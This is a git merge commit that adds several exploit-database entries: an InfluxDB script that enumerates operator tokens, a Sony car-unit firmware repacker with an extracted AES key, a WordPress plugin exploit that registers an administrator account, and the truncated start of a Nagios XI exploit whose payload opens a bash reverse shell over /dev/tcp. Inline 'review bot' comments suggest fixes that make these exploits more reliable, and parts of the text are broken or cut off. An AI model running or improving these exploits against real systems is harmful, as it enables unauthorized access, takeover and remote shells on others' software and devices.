Merge remote-tracking branch 'exploitdb/main'
6a8464a842
9 changed files with 1114 additions and 0 deletions
221
exploits/multiple/remote/52142.py
Executable file
@ -0,0 +1,221 @@
# Exploit Title: InfluxDB OSS Operator Privilege Escalation via BusinessLogic Flaw
# Date: 22/03/2024
# Exploit Author: Andrea Pasin (Xenom0rph97)
# Researcher Homepage: https://xenom0rph97.github.io/xeno/
# GitHub Exploit repo: https://github.com/XenoM0rph97/CVE-2024-30896
# Software Link: https://www.influxdata.com/products/influxdb/
# Version: 2.x <=> 2.7.11
# Tested on: InfluxDB OSS 2.x
# CVE: CVE-2024-30896
# CVSS Base Score: 9.1
# CVSS v3.1 Vector: AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

# CVE-2024-30896

## Summary
A business logic flaw in influxdb allows users who own a valid allAccess
token to escalate their privileges at operator level by listing current
authorization tokens.

## Scenario
Attacker might be a user which was gained access by an administrator via an
allAccess token only within their organization.
This user's permissions will allow full control over the organization but
will still prevent him to interact with other orgs.

## Impact
This vulnerability would allow a user to obtain unrestricted access to the
influxdb instance. A similar condition might fully compromise
Confidentiality, Integrity and Availability of data owned by users of
different organizations. Additionally, since operator token has
administrative permissions, Availability and Integrity of the entire
influxdb instance might be compromised.

## Prerequisites/Limitations
1. Attacker must have a valid allAccess token
2. allAccess token must have been created in the same Org where an operator
token resides (ex. same Org as Admin user)
3. Attacker must be able to interact with influxdb instance via CLI or APIs
(influxClient)

## Steps to Reproduce
### Case 1: Exploitation via influxdb APIs:
*Python Version*: 3
*Requirements*: `influxdb_client==1.41.0`
*Script usage*
```
% python3 ./CVE-2024-30896.py -h
usage: CVE-2024-30896.py [-h] [-t TOKEN] [-e ENDPOINTURL] [-v [VERBOSE]]
[-vv [VVERBOSE]]

optional arguments:
-h, --help show this help message and exit
-t TOKEN, --token TOKEN
Custom or allAccess token to access influx DB
instance
-e ENDPOINTURL, --endpointUrl ENDPOINTURL
Endpoint Url of influxdb instance (ex. "
https://myInfluxdbInstance:8086/")
-v [VERBOSE], --verbose [VERBOSE]
Enable verbose logging - INFO
-vv [VVERBOSE], --vverbose [VVERBOSE]
Enable verbose logging - DEBUG
```

### Case 2: Exploitation via influx CLI
1. Execute: `influx auth ls -t <allAccessToken> | grep write:/orgs`. This
will list all current active operator tokens on the influxdb instance.

*Example*
```
# Using an allAccess token
influx auth ls -t U1OuqmFC{REDACTED} | grep U1OuqmFC{REDACTED}

0cc41c3b050e5000 U1OuqmFC{REDACTED}
admin 0cb9c92ee228b000 [read:orgs/87d0746948a3b3f5/authorizations
write:orgs/87d0746948a3b3f5/authorizations
read:orgs/87d0746948a3b3f5/buckets write:orgs/87d0746948a3b3f5/buckets
read:orgs/87d0746948a3b3f5/dashboards
write:orgs/87d0746948a3b3f5/dashboards read:/orgs/87d0746948a3b3f5
read:orgs/87d0746948a3b3f5/sources write:orgs/87d0746948a3b3f5/sources
read:orgs/87d0746948a3b3f5/tasks write:orgs/87d0746948a3b3f5/tasks
read:orgs/87d0746948a3b3f5/telegrafs write:orgs/87d0746948a3b3f5/telegrafs
read:/users/0cb9c92ee228b000 write:/users/0cb9c92ee228b000
read:orgs/87d0746948a3b3f5/variables write:orgs/87d0746948a3b3f5/variables
read:orgs/87d0746948a3b3f5/scrapers write:orgs/87d0746948a3b3f5/scrapers
read:orgs/87d0746948a3b3f5/secrets write:orgs/87d0746948a3b3f5/secrets
read:orgs/87d0746948a3b3f5/labels write:orgs/87d0746948a3b3f5/labels
read:orgs/87d0746948a3b3f5/views write:orgs/87d0746948a3b3f5/views
read:orgs/87d0746948a3b3f5/documents write:orgs/87d0746948a3b3f5/documents
read:orgs/87d0746948a3b3f5/notificationRules
write:orgs/87d0746948a3b3f5/notificationRules
read:orgs/87d0746948a3b3f5/notificationEndpoints
write:orgs/87d0746948a3b3f5/notificationEndpoints
read:orgs/87d0746948a3b3f5/checks write:orgs/87d0746948a3b3f5/checks
read:orgs/87d0746948a3b3f5/dbrp write:orgs/87d0746948a3b3f5/dbrp
read:orgs/87d0746948a3b3f5/notebooks write:orgs/87d0746948a3b3f5/notebooks
read:orgs/87d0746948a3b3f5/annotations
write:orgs/87d0746948a3b3f5/annotations read:orgs/87d0746948a3b3f5/remotes
write:orgs/87d0746948a3b3f5/remotes read:orgs/87d0746948a3b3f5/replications
write:orgs/87d0746948a3b3f5/replications]

# Listing all available tokens passing allAccess token and retrieving only
operator level tokens
influx auth ls -t U1OuqmFC{REDACTED} | grep write:/orgs

0cbb920e128e5000 gerKYLO0Ph_ibUk0y{REDACTED}
admin 0cb9c92ee228b000 [read:/authorizations write:/authorizations
read:/buckets write:/buckets read:/dashboards write:/dashboards read:/orgs
write:/orgs read:/sources write:/sources read:/tasks write:/tasks
read:/telegrafs write:/telegrafs read:/users write:/users read:/variables
write:/variables read:/scrapers write:/scrapers read:/secrets
write:/secrets read:/labels write:/labels read:/views write:/views
read:/documents write:/documents read:/notificationRules
write:/notificationRules read:/notificationEndpoints
write:/notificationEndpoints read:/checks write:/checks read:/dbrp
write:/dbrp read:/notebooks write:/notebooks read:/annotations
write:/annotations read:/remotes write:/remotes read:/replications
write:/replications]

influxdb_client==1.41.0

import influxdb_client
import argparse
import logging
import sys

argParser = argparse.ArgumentParser()
argParser.add_argument("-t", "--token", type=str, help="Custom or allAccess token to access influx DB instance")
argParser.add_argument("-e", "--endpointUrl", type=str, help="Endpoint Url of influxdb instance (ex. \"https://myInfluxdbInstance:8086/\")")
argParser.add_argument("-v", "--verbose", type=bool, const=True, nargs='?', help="Enable verbose logging - INFO")
argParser.add_argument("-vv", "--vverbose", type=bool, const=True, nargs='?', help="Enable verbose logging - DEBUG")

args = argParser.parse_args()

# Using user retrieved values or default (hardcoded) ones
all_access_token = "<allAccessToken>"
influx_endpoint_url = "<influxdbEndpointUrl>"

# Defining some colors
red = "\033[31m"
yellow = "\033[93m"
purple = "\33[1;95m"
green = "\033[0;92m"
cyan = "\033[96m"
bold ="\033[1m"
endc = "\033[39m"

if args.vverbose == True:
logging.basicConfig(level=logging.DEBUG)
elif args.verbose == True:
logging.basicConfig(level=logging.INFO)

logger = logging.getLogger()

if args.token:
token = args.token
else:
logger.debug(f"{yellow}User did not set a token, using default one{endc}")
token = all_access_token

if args.endpointUrl:
endpointUrl = args.endpointUrl
else:
logger.debug(f"{yellow}User did not set an endpoint Url for influxdb, using default one{endc}")
endpointUrl = influx_endpoint_url

logger.info(f"{cyan}Connecting to influx DB instance{endc}")
# Connecting to influxdb instance
try:
conn = influxdb_client.InfluxDBClient(
url=endpointUrl,
token=token,
debug=False,
verify_ssl=True
)

# Verify InfluxDB connection
health = conn.ping()
if not health:
logger.error(f"{red}Unable to connect to db instace " + endpointUrl + f"{endc}")
print(f"{red}Quitting execution...{endc}")
sys.exit(1)

except Exception as e:
logger.error(f"{red}Failed to connect to db instance: " + endpointUrl + " Error: " + str(e) + f"{endc}")
print(f"{red}Quitting execution...{endc}")
sys.exit(1)

# Retrieving all current auths
logger.debug(f"{yellow}Retrieving all auth tokens{endc}")
print(f"{cyan}Enumerating current authorizations...{endc}")
try:
auths = conn.authorizations_api().find_authorizations()
except Exception as e:
logger.error(f"{red}Unable to retrieve authorizations. ERR: " + str(e) +f"{endc}")
print(f"{red}Unable to retrieve authorizations. Quitting...{endc}")
sys.exit(1)
if not auths:
print(f"{cyan}No Authorization tokens found on the instance{endc}")
sys.exit(1)
print(f"{cyan}{str(len(auths))} tokens found on the instance{endc}\n")
# Extracting operator token -> Parsing permissions to look for ("org = None" and "authType = write/auths"), not 100% efficiency -> TO OPTIMIZE
logger.debug(f"{yellow}Parsing auth permissions to retrieve operator tokens{endc}")
print(f"{cyan}Enumerating all operator tokens:{endc}")
op_tokens = []
# In order to understand if a token is of type "operator" we need to enumerate all permissions and look for "write/auths" on org 'None' -> Unrescticted access
try:
for auth in auths:
if auth.permissions:
for perm in auth.permissions:
if perm.action == "write" and perm.resource.org == None and perm.resource.type == "authorizations":
op_tokens.append(auth.token)
except Exception as e:
logger.error(f"{red}Unable to parse permissions on found authorizations. ERR: " + str(e) + f"{endc}")
print(f"{red}Unable to parse permissions on found authorizations. Quitting execution...{endc}")
sys.exit(1)

logger.info(f"{cyan}Printing all operator auth tokens{endc}")
print(f"{cyan}{str(len(op_tokens))} operator tokens found.\n\nListing all operator tokens:\n{endc}")
for op_t in op_tokens:
print(f"{green}{op_t}{endc}")
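Review bot: this file will not run as committed, because the README body pasted between `# CVE-2024-30896` and `influxdb_client==1.41.0` is not commented out. The first non-comment line, `A business logic flaw in influxdb allows users who own a valid allAccess`, is a SyntaxError for the interpreter before `import influxdb_client` is ever reached, and the bare requirements pin `influxdb_client==1.41.0` is not a valid statement either. Either prefix every README and requirements line with `#` or move them into companion files so the script starts at the imports. Two smaller points: the placeholder defaults `all_access_token = "<allAccessToken>"` and `influx_endpoint_url = "<influxdbEndpointUrl>"` are used silently (only a debug-level log) when `-t` or `-e` is omitted, so `required=True` on both arguments would fail fast instead of attempting a connection with a placeholder; and the `-v`/`-vv` flags use `type=bool` with `nargs='?'`, so `-v False` still enables logging because `bool("False")` is true, where `action="store_true"` is the idiomatic form. The file is also added with the executable bit but no shebang line, so `./52142.py` is handed to the shell rather than to python3.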
355
exploits/multiple/remote/52143.py
Executable file
@ -0,0 +1,355 @@
# Exploit Title: Sony XAV-AX5500 Firmware Update Validation Remote Code Execution
# Date: 11-Feb-2025
# Exploit Author: lkushinada
# Vendor Homepage: https://www.sony.com/et/electronics/in-car-receivers-players/xav-ax5500
# Software Link: https://archive.org/details/xav-ax-5500-v-113
# Version: 1.13
# Tested on: Sony XAV-AX5500
# CVE : CVE-2024-23922

# From NIST CVE Details:
# ====
# This vulnerability allows physically present attackers to execute arbitrary code on affected
# installations of Sony XAV-AX5500 devices. Authentication is not required to exploit this
# vulnerability. The specific flaw exists within the handling of software updates. The issue
# results from the lack of proper validation of software update packages. An attacker can leverage
# this vulnerability to execute code in the context of the device.
# Was ZDI-CAN-22939
# ====

# # Summary
# Sony's firmware validation for a number of their XAV-AX products relies on symetric cryptography,
# obscurity of their package format, and a weird checksum method instead of any real firmware
# signing mechanism. As such, this can be exploited to craft updates which bypass firmware validation
# and allow a USB-based attacker to obtain RCE on the infotainment unit.

# What's not mentioned in the CVE advisories, is that this method works on the majority of Sony's
# infotainment units and products which use a similar chipset or firmware package format. Tested
# to work on most firmware versions prior to v2.00.

# # Threat Model
# An attacker with physical access to an automotive media unit can typically utilize other methods
# to achieve a malicious outcome. The reason to investigate the firmware to the extent in this post
# is academic, exploratory, and cautionary, i.e. what other systems are protected in a similar
# manner? if they are, how trivial is it to bypass?

# # Disclaimer
# The information in this article is for educational purposes only.
# Tampering with an automotive system comes with risks which, if you don't understand, you should
# not be undertaking.
# THE AUTHORS DISCLAIM ANY AND ALL RESPONSIBILITY FOR CONSEQUENTIAL OR INCIDENTAL DAMAGES ARISING
# FROM THE USE OF ANYTHING IN THIS DOCUMENT.


# # The Unit
# ## Processors
# - DAC
# - System Management Controller (SMC)
# - Applications Processor
# - Display Processor

# Coming from a mobile and desktop computer environment, one may be use to thinking about
# the Applications Processor as the most powerful chip in the system in terms of processing power,
# size, power consumption, and system hierarchy. The first oddity of this platform is that the
# application processor is not the most powerful; that honor goes to the DAC, a beefy ARM chip on the
# board.

# The application processor does not appear to be the orchestrator of the components on the system.
# The SMC tkes which takes the role of watchdog, power state management, and input (think remote
# controls, steering wheel button presses) routing.
# For our purposes, it is the Applications processor we're interested in, as it is
# the system responsible for updating the unit via USB.

# ## Interfaces
# We're going to be attacking the unit via USB, as it's the most readily exposed
# interface to owners and would-be attackers.
# Whilst the applications processor does have a UART interface, the most recent iterations of the
# unit do not expose any headers for debugging via UART, and the one active UART line found to be
# active was for message passing between the SMC and app processor, not debug purposes. Similarly, no
# exposed JTAG interfaces were found to be readily exposed on recent iterations of the unit. Sony's
# documentation suggests these are not enabled, but this could not be verified during testing. At the
# very least, JTAG was not found to be exposed on an accessible interface.

# ## Storage
# The boards analyzed had two SPI NOR flash chips, one with an unencrypted firmware image on it. This
# firmware was RARd. The contents of SPI flash was analyzed to determine many of the details
# discussed in this report.

# ## The Updater
# Updates are provided on Sony's support website. A ZIP package is provided with three files:
# - SHDS1132.up6
# - SHMC1132.u88
# - SHSO1132.fir
# The largest of these files (8 meg), the .fir, is in a custom format, and appears encrypted.
# The FIR file has a header which contains the date of firmware publication, the strings KRSELCO and
# SKIP, a chunk of zeros, and then a highish entropy section, and some repeating patterns of interest:

# 00002070 b7 72 10 03 00 8c 82 7e aa d1 83 58 23 ef 82 5c |.r.....~...X#..\|
# *
# 00002860 b7 72 10 03 00 8c 82 7e aa d1 83 58 23 ef 82 5c |.r.....~...X#..\|

# 00744110 b7 72 10 03 00 8c 82 7e aa d1 83 58 23 ef 82 5c |.r.....~...X#..\|
# *
# 00800020 b7 72 10 03 00 8c 82 7e aa d1 83 58 23 ef 82 5c |.r.....~...X#..\|


# ## SPI Flash
# Dumping the contents of the SPI flash shows a similar layout, with slightly different offsets:
# 00001fe0 10 10 10 10 10 10 10 10 ff ff ff ff ff ff ff ff |................|
# 00001ff0 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff |................|
# *
# 000027f0 ff ff ff ff ff ff ff ff ff ff ff ff 00 03 e7 52 |...............R|
# 00002800 52 61 72 21 1a 07 00 cf 90 73 00 00 0d 00 00 00 |Rar!.....s......|
#
# 0007fff0 ff ff ff ff ff ff ff ff ff ff ff ff 00 6c 40 8b |.............l@.|
# 00080000 52 61 72 21 1a 07 00 cf 90 73 00 00 0d 00 00 00 |Rar!.....s......|
# ...
# 00744090 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff |................|
# *
# 00778000
#
# This given the offsets and spacing, we suspect that the .FIR matches the contents of the SPI.
# Decompressing the RARs at the 0x2800 and 0x80000, we get the recovery and main applications.

# Once we remove the packaging bytes, seeing that the repetive patterns align with FF's, gives
# us a strong indication the encryption function is operating in an ECB-style configuration,
# giving us an avenue, even if we do not recover the key, to potentially make modifications
# to the firmware depending on how the checksum is being calculated.

# ## Firmware
# The recovery application contains the decompression, decryption and checksum methods.
# Putting the recovery_16.bin into ghidra and setting the memory map to load us in at 0x2800,
# we start taking a look at the relevant functions by way of:
# - looking for known strings (KRSELCO)
# - analyizing the logic and looking for obvious "if this passed, begin the update, else fail"
# - looking for things that look like encryption (loads of bitshifting math in one function)
# Of interest to us, there is:
# - 0x0082f4 - a strcmp between KRSELCO and the address the incoming firmware update is at, plus 0x10
# - 0x00897a - a function which sums the total number of bytes until we hit 0xA5A5A5A5
# - 0x02d4ce - the AES decryption function
# - 0x040dd4 - strcmp (?)
# - 0x040aa4 - memcpy (?)
# - 0x046490 - the vendor plus the a number an idiot would use for their luggage, followed by enough
# padding zeros to get us to a 16 byte key

# This gives us all the information we need, other than making some guesses as to the general package
# and header layout of the update package, to craft an update packager that allows arbitrary
# modification of the firmware.

# # Proof of Concept
# The PoC below will take an existing USB firmware update, decrypt and extract the main binary,
# pause whilst you make modifications (e.g. changing the logic or modifying a message), and repackage
# the update.

# ## Requirements
# - Unixish system
# - WinRar 2.0 (the version the Egyptians built the pyramids with)

# ## Usage
# cve-2024-23922.py path_to_winrar source.fir output.fir

import argparse
import sys
import os
import tempfile
import shutil
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.backends import default_backend

# Filenames as found in the .FIR
MAIN_BINARY_NAME="main_16.bin"
MAIN_RAR_NAME="main_16.rar"
DECRYPTED_FILE_NAME="decrypt.bin"
ENCRYPTED_FILE_NAME="encrypt.bin"

# Offsets in the .FIR
HEADER_LENGTH=0x80
RECOVERY_OFFSET=0x2800
MAIN_OFFSET=0x80000
CHECKSUM_OFFSET=0x800000-0x10
CHECKSUM_SIZE=0x4
RAR_LENGTH_OFFSET=0x4
RAR_LENGTH_SIZE=0x4

# From 0x46490 in recovery_16.bin
ENCRYPTION_KEY=b'\x54\x41\x4d\x55\x4c\x31\x32\x33\x34\x00\x00\x00\x00\x00\x00\x00'

def decrypt_file(input_file, output_file):
backend = default_backend()
cipher = Cipher(algorithms.AES(ENCRYPTION_KEY), modes.ECB(), backend=backend)
decryptor = cipher.decryptor()

with open(input_file, 'rb') as file:
ciphertext = file.read()

# Strip the unencrypted header
ciphertext = ciphertext[HEADER_LENGTH:]

decrypted_data = decryptor.update(ciphertext) + decryptor.finalize()

with open(output_file, 'wb') as file:
file.write(decrypted_data)

def aes_encrypt_file(input_file, output_file):
backend = default_backend()
cipher = Cipher(algorithms.AES(ENCRYPTION_KEY), modes.ECB(), backend=backend)
encryptor = cipher.encryptor()

with open(input_file, 'rb') as file:
plaintext = file.read()

ciphertext = encryptor.update(plaintext) + encryptor.finalize()

with open(output_file, 'wb') as file:
file.write(ciphertext)

def get_sony_32(data):
csum = int()
for i in data:
csum = csum + i
return csum % 2147483648 # 2^31

def validate_args(winrar_path, source_file, destination_file):
# Check if the WinRAR executable exists and is a file
if not os.path.isfile(winrar_path) or not os.access(winrar_path, os.X_OK):
print(f"[x] Error: The specified WinRAR path '{winrar_path}' is not a valid executable.")
sys.exit(1)

# Check if the source file exists
if not os.path.isfile(source_file):
print(f"[x] Error: The specified source file '{source_file}' does not exist.")
sys.exit(1)

# Read 8 bytes from offset 0x10 in the source file
try:
with open(source_file, 'rb') as f:
f.seek(0x10)
signature = f.read(8)
if signature != b'KRSELECO':
print(f"[x] Error: The source file '{source_file}' does not contain the expected signature.")
sys.exit(1)
except Exception as e:
print(f"[x] Error: Failed to read from '{source_file}': {e}")
sys.exit(1)

# Check if the destination file already exists
if os.path.exists(destination_file):
print(f"[x] Error: The destination file '{destination_file}' already exists.")
sys.exit(1)

def main():
parser = argparse.ArgumentParser(description="CVE-2024-23922 Sony XAV-AX5500 Firmware Modifier")
parser.add_argument("winrar_path", help="Path to WinRAR 2.0 executable (yes, the ancient one)")
parser.add_argument("source_file", help="Path to original .FIR file")
parser.add_argument("destination_file", help="Path to write the modified .FIR file to")

args = parser.parse_args()

validate_args(args.winrar_path, args.source_file, args.destination_file)
RAR_2_PATH = args.winrar_path
GOOD_FIRMWARE_FILE = args.source_file
DESTINATION_FIRMWARE_FILE = args.destination_file

# make temporary directory
workdir = tempfile.mkdtemp(prefix="sony_firmware_modifications")

# copy the good firmware file into the temp directory
temp_fir_file = os.path.join(workdir, os.path.basename(GOOD_FIRMWARE_FILE))
shutil.copyfile(GOOD_FIRMWARE_FILE, temp_fir_file)

print("[+] Cutting the head off and decrypting the contents")
decrypted_file_path = os.path.join(workdir, DECRYPTED_FILE_NAME)
decrypt_file(input_file=temp_fir_file, output_file=decrypted_file_path)

print("[+] Dump out the rar file")
with open(decrypted_file_path, 'rb') as file:
# right before the rar file there is a 4 byte length header for the rar file. get that.
file.seek(MAIN_OFFSET-RAR_LENGTH_OFFSET)
original_rar_length = int.from_bytes(file.read(RAR_LENGTH_SIZE), "big")
rar_file_bytes = file.read(original_rar_length)

# now dump that out
rar_file_path=os.path.join(workdir, MAIN_RAR_NAME)
with open(rar_file_path, 'wb') as rarfile:
rarfile.write(rar_file_bytes)

# check that the stat of the file matches what the header told us
dumped_rar_size = os.stat(rar_file_path).st_size
if dumped_rar_size != original_rar_length:
print("[!] extracted filesizes dont match, there may be corruption", dumped_rar_size, original_rar_length)

print("[+] Extracting the main binary from the rar file")
os.system("unrar x " + rar_file_path + " " + workdir)

print("[!] Okay, I'm now going to wait until you have had a chance to make modifications")
print("Please modify this file:", os.path.join(workdir, MAIN_BINARY_NAME))
input()

print("[+] Continuing")
print("[+] Putting your main binary back into the rar file")
os.system("wine " + RAR_2_PATH + " u -tk -ep " + rar_file_path + " " + workdir + "/" + MAIN_BINARY_NAME)

# we could fix this by writing some FFs
new_rar_size=os.stat(rar_file_path).st_size
if dumped_rar_size > os.stat(rar_file_path).st_size:
print("[!!] The rar size is smaller than the old one. This might cause a problem.")
print("[!!] Push any key to continue, ctrl+c to abort")
input()

with open(decrypted_file_path, 'r+b') as file:
# right before the rar file there is a 4 byte length header for the rar file. go back there
file.seek(MAIN_OFFSET-RAR_LENGTH_OFFSET)

# overwrite the old size with the new size
file.write(new_rar_size.to_bytes(RAR_LENGTH_SIZE, "big"))

print("[+] Deleting the old rar from the main container")
# delete the old rar from the main container by FFing it up
file.write(b'\xFF'*original_rar_length)

# seek back to the start
file.seek(MAIN_OFFSET)

print("[+] Loading the new rar back into the main container")
with open(rar_file_path, 'rb') as rarfile:
new_rarfile_bytes = rarfile.read()
file.write(new_rarfile_bytes)

print("[+] Updating Checksum")
with open(decrypted_file_path, 'rb') as file:
contents = file.read()

contents = contents[:-0x0010]
s32_sum = get_sony_32(contents)

with open(decrypted_file_path, 'r+b') as file:
file.seek(CHECKSUM_OFFSET)
# read out the current checksum
old_checksum_bytes=file.read(CHECKSUM_SIZE)
print("old checksum:", int.from_bytes(old_checksum_bytes, "big"), old_checksum_bytes)

# go back and update it with new checksum
print("new checksum:", s32_sum, hex(s32_sum))
new_checksum_bytes=s32_sum.to_bytes(CHECKSUM_SIZE, "big")
file.seek(CHECKSUM_OFFSET)
file.write(new_checksum_bytes)

print("[+] Encrypting the main container back up")
encrypted_file_path = os.path.join(workdir, ENCRYPTED_FILE_NAME)
aes_encrypt_file(decrypted_file_path, encrypted_file_path)

print("[+] Reattaching the main container to the header and writing to dest")
with open(DESTINATION_FIRMWARE_FILE, 'wb') as file:
with open(temp_fir_file, 'rb') as firfile:
header = firfile.read(HEADER_LENGTH)
file.write(header)
with open(encrypted_file_path, 'rb') as encfile:
enc_contents = encfile.read()
file.write(enc_contents)

print("[+] DONE!!! Any key to delete temp files, ctrl+c to keep them.")
input()
shutil.rmtree(workdir)

if __name__ == "__main__":
main()
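Review bot: the size check after re-packing guards the wrong case. At `if dumped_rar_size > os.stat(rar_file_path).st_size:` the script warns only when the new RAR is smaller than the original, but that case is already covered by the later `file.write(b'\xFF'*original_rar_length)`, which pads the freed tail with 0xFF before the new archive is written; the unhandled case is a new RAR that is larger than `original_rar_length`, where `file.write(new_rarfile_bytes)` runs past the old region into whatever follows it in the container with no bounds check at all, and the length field at `MAIN_OFFSET-RAR_LENGTH_OFFSET` is updated regardless. Suggest aborting when `new_rar_size > original_rar_length` (or at least when the write would reach `CHECKSUM_OFFSET`) and dropping the misleading "smaller" warning together with the stale `# we could fix this by writing some FFs` comment. Second, `validate_args` compares the 8 bytes at offset 0x10 with `b'KRSELECO'`, while the write-up and the strcmp noted at 0x0082f4 both give the marker as `KRSELCO` (7 characters); one of the two spellings is wrong, and if the header really reads `KRSELCO` the check rejects every genuine `.fir`. Smaller points: `unrar` and `wine` are runtime dependencies but the Requirements section lists only WinRAR 2.0; both `os.system(...)` calls build the command line by string concatenation, so a work directory or archive path containing a space or shell metacharacter breaks them (`subprocess.run([...])` with an argument list avoids that); and the file is committed with the executable bit but no shebang line.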
126
exploits/multiple/webapps/52137.txt
Normal file
@ -0,0 +1,126 @@
|
|||
# Exploit Title: WordPress User Registration & Membership Plugin <= 4.1.1 - Unauthenticated Privilege Escalation
|
||||
# Exploit Author: Al Baradi Joy
|
||||
# Date: 2025-04-07
|
||||
# Vendor Homepage: https://wordpress.org/plugins/user-registration/
|
||||
# Software Link:
|
||||
https://downloads.wordpress.org/plugin/user-registration.4.1.1.zip
|
||||
# Version: <= 4.1.1
|
||||
# Tested on: WordPress 6.4.3
|
||||
# CVSS: 9.8 (CRITICAL)
|
||||
# CWE: CWE-269
|
||||
# References:
|
||||
# https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/user-registration/user-registration-membership-411-unauthenticated-privilege-escalation
|
||||
# https://patchstack.com/database/wordpress/plugin/user-registration/vulnerability/wordpress-user-registration-membership-plugin-4-1-2-unauthenticated-privilege-escalation-vulnerability
|
||||
# https://nvd.nist.gov/vuln/detail/CVE-2025-2563
|
||||
|
||||
import re
|
||||
import json
|
||||
import requests
|
||||
import random
|
||||
import string
|
||||
from urllib.parse import urljoin
|
||||
|
||||
def banner():
|
||||
print("\n[+] CVE-2025-2563 - WP User Registration Privilege Escalation")
|
||||
print("[+] Made By Al Baradi Joy\n")
|
||||
|
||||
def randstring(n=8):
|
||||
return ''.join(random.choices(string.ascii_lowercase, k=n))
|
||||
|
||||
def get_regex(content, pattern, group=1, name=""):
|
||||
match = re.search(pattern, content)
|
||||
if not match:
|
||||
raise ValueError(f"[-] Could not extract {name} (Pattern:
|
||||
{pattern})")
|
||||
return match.group(group)
|
||||
|
||||
def exploit(target):
|
||||
session = requests.Session()
|
||||
username = randstring()
|
||||
password = randstring() + "!@"
|
||||
email = f"{username}@exploit.test"
|
||||
|
||||
try:
|
||||
print("[+] Getting registration page...")
|
||||
r = session.get(urljoin(target, "/membership-registration/"),
|
||||
timeout=10)
|
||||
r.raise_for_status()
|
||||
page = r.text
|
||||
|
||||
nonce = get_regex(page,
|
||||
r'"user_registration_form_data_save":"(.*?)"', name="nonce")
|
||||
formid = get_regex(page, r"id='user-registration-form-([0-9]+)'",
|
||||
name="formid")
|
||||
memval = get_regex(page,
|
||||
r'id="ur-membership-select-membership-([0-9]+)', name="membership value")
|
||||
memname = get_regex(page,
|
||||
r'data-field-id="membership_field_([0-9]+)"', name="membership field name")
|
||||
front_nonce = get_regex(page, r'name="ur_frontend_form_nonce"
|
||||
value="(.*?)"', name="frontend_nonce")
|
||||
loc_nonce = get_regex(page, r'ur_membership_frontend_localized_data
|
||||
= {"_nonce":"(.*?)"', name="localized_frontend_nonce")
|
||||
|
||||
print("[+] Submitting registration form...")
|
||||
form_data = [
|
||||
{"field_name": "user_login", "value": username, "field_type":
|
||||
"text", "label": "Username"},
|
||||
{"field_name": "user_email", "value": email, "field_type":
|
||||
"email", "label": "User Email"},
|
||||
{"field_name": "user_pass", "value": password, "field_type":
|
||||
"password", "label": "User Password"},
|
||||
{"field_name": "user_confirm_password", "value": password,
|
||||
"field_type": "password", "label": "Confirm Password"},
|
||||
{"value": memval, "field_type": "radio", "label": "membership",
|
||||
"field_name": f"membership_field_{memname}"}
|
||||
]
|
||||
|
||||
payload = {
|
||||
"action": "user_registration_user_form_submit",
|
||||
"security": nonce,
|
||||
"form_data": json.dumps(form_data),
|
||||
"form_id": formid,
|
||||
"registration_language": "en-US",
|
||||
"ur_frontend_form_nonce": front_nonce,
|
||||
"is_membership_active": memval,
|
||||
"membership_type": memval
|
||||
}
|
||||
|
||||
r2 = session.post(urljoin(target, "/wp-admin/admin-ajax.php"),
|
||||
data=payload, timeout=10)
|
||||
|
||||
if '"success":true' not in r2.text:
|
||||
print("[-] Registration form failed.")
|
||||
return
|
||||
|
||||
print("[+] Sending membership registration as administrator...")
|
||||
member_payload = {
|
||||
"action": "user_registration_membership_register_member",
|
||||
"security": loc_nonce,
|
||||
"members_data": json.dumps({
|
||||
"membership": "1",
|
||||
"payment_method": "free",
|
||||
"start_date": "2025-3-29",
|
||||
"username": username,
|
||||
"role": "administrator"
|
||||
})
|
||||
}
|
||||
|
||||
r3 = session.post(urljoin(target, "/wp-admin/admin-ajax.php"),
|
||||
data=member_payload, timeout=10)
|
||||
|
||||
if '"success":true' in r3.text:
|
||||
print("[+] Exploit Successful!")
|
||||
print(f"[+] Admin Username: {username}")
|
||||
print(f"[+] Admin Password: {password}")
|
||||
else:
|
||||
print("[-] Membership escalation failed.")
|
||||
|
||||
except Exception as e:
|
||||
print(f"[-] Exploit failed: {str(e)}")
|
||||
|
||||
if __name__ == "__main__":
|
||||
banner()
|
||||
target = input("Enter target WordPress site (e.g., http://example.com):
|
||||
").strip().rstrip('/')
|
||||
if not target.startswith("http"):
|
||||
target = "http:
|
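Review bot: the escalation request hardcodes `"membership": "1"` and `"start_date": "2025-3-29"` in `member_payload` even though the script already scraped the real membership id into `memval` (from `id="ur-membership-select-membership-([0-9]+)`) and sends it in the first request as `membership_type`; on a site whose membership id is not 1 the registration step succeeds and the escalation step fails, leaving a plain subscriber account behind. Reuse `memval` there and derive the date at runtime (`datetime.date.today().isoformat()` after `import datetime`) instead of a constant. Two smaller points: both success checks are substring matches on `'"success":true'`, where `r2.json().get("success") is True` is the robust form, and the file as rendered ends mid-statement at `target = "http:`, so please confirm the committed 52137.txt is complete past that line.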
90
exploits/multiple/webapps/52138.txt
Normal file
|
@ -0,0 +1,90 @@
|
|||
# Exploit Title: Nagiosxi authenticated Remote Code Execution
|
||||
# Date: 17/02/2024
|
||||
# Exploit Author: Calil Khalil
|
||||
# Vendor Homepage: https://www.nagios.com/products/nagios-xi/
|
||||
# Version: Nagios Xi 5.6.6
|
||||
# Tested on: Ubuntu
|
||||
# CVE : CVE-2019-15949
|
||||
|
||||
#
|
||||
# python3 exp.py -t https://<target>/ -b /<nagiosxi-path>/ -u user -p 'password' -lh <rev-ip> -lp <rev-port> -k (ignore cert)
|
||||
#
|
||||
|
||||
import argparse
|
||||
import re
|
||||
import requests
|
||||
import urllib3
|
||||
|
||||
class Nagiosxi():
|
||||
def __init__(self, target, parameter, username, password, lhost, lport, ignore_ssl):
|
||||
self.url = target
|
||||
self.parameter = parameter
|
||||
self.username = username
|
||||
self.password = password
|
||||
self.lhost = lhost
|
||||
self.lport = lport
|
||||
self.ignore_ssl = ignore_ssl
|
||||
self.login()
|
||||
|
||||
def upload(self, session):
|
||||
print("Uploading Malicious Check Ping Plugin")
|
||||
upload_url = self.url + self.parameter + "/admin/monitoringplugins.php"
|
||||
upload_token = session.get(upload_url, verify=not self.ignore_ssl)
|
||||
nsp = re.findall('var nsp_str = "(.*)";', upload_token.text)
|
||||
print("Upload NSP Token: " + nsp[0])
|
||||
payload = "bash -c 'bash -i >& /dev/tcp/" + self.lhost + "/" + self.lport + " 0>&1'"
|
||||
